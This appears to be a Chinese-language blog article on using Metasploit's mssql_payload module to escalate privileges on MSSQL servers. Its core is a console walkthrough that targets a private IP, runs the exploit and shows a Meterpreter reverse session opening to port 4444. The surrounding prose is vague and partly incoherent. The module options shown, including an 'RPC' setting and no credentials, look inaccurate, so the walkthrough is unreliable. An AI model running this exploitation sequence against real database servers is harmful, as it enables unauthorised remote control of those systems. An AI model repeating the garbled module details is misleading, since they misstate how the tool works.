MSF神器突破难关,挖掘MSSQL提权之路(msf破解mssql提权)
当对抗网络攻击时,管理员不得不深入了解威胁的数据库,例如MSSQL,以便发现攻击者在发起攻击时访问的数据库;而安全工作者也要求其他组织掌握当前面临威胁的管理数据库。但威胁管理不仅仅是检查数据库;它也包括在应用程序、数据库和系统管理程序中浏览数据,学习其功能,了解可以利用的服务等。
Metasploit是一款开源的强大的框架,可以实现安全性测试、安全扫描和POC挖掘,进而突破攻击者与目标系统之间的安全壁垒。特别是在MSSQL的提权过程中,MSF提供了很多有用的模块,可以让我们更加清楚地了解本地数据库,也可以用于在多实例数据库系统中测试安全性,从而开发出更加强大的攻击手段。
MSF模块不仅能够实现数据库指纹识别,还可以帮助安全工作者检测环境中的攻击技术,通过MSF可以自动化地发现,这有利于发现有漏洞的数据库,此外,还提供实用的模块,可以在不同形式的数据库中检测特定类型的漏洞,从而获取有效的代码。
MSF还支持用户使用ruby脚本,实现攻击手段的自动化,实现数据库访问。以下为一个常见的MSSQL DB提权示例:
# Use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > show options
Module options (exploit/windows/mssql/mssql_payload):
Name Current Setting Required Description---- --------------- -------- -----------
RHOST 172.26.11.134 yes The target addressRPC YES yes Use RPC for communication
# 设置RHOSTmsf exploit(mssql_payload) > set RHOST 172.26.11.134
RHOST => 172.26.11.134
#设置RPC为yesmsf exploit(mssql_payload) > set RPC yes
RPC => yes
#选择exploitmsf exploit(mssql_payload) > exploit
[+] Sending stage (748736 bytes) to 172.26.11.134[+] Meterpreter session 1 opened (172.26.11.139:4444 -> 172.26.11.134:1563) at 2020-08-17 07:07:37 -0400
meterpreter >
MSF能够提升攻击结果的定位和准确率,进而提高安全等级。MSF可以快速分析不安全的数据库,以此判断攻击者可以利用的手段,进而采取有效的预防措施,避免受到破坏和数据失窃攻击。因此,安全工作者应该熟悉并利用MSF框架,用来与数据库的提权过程中。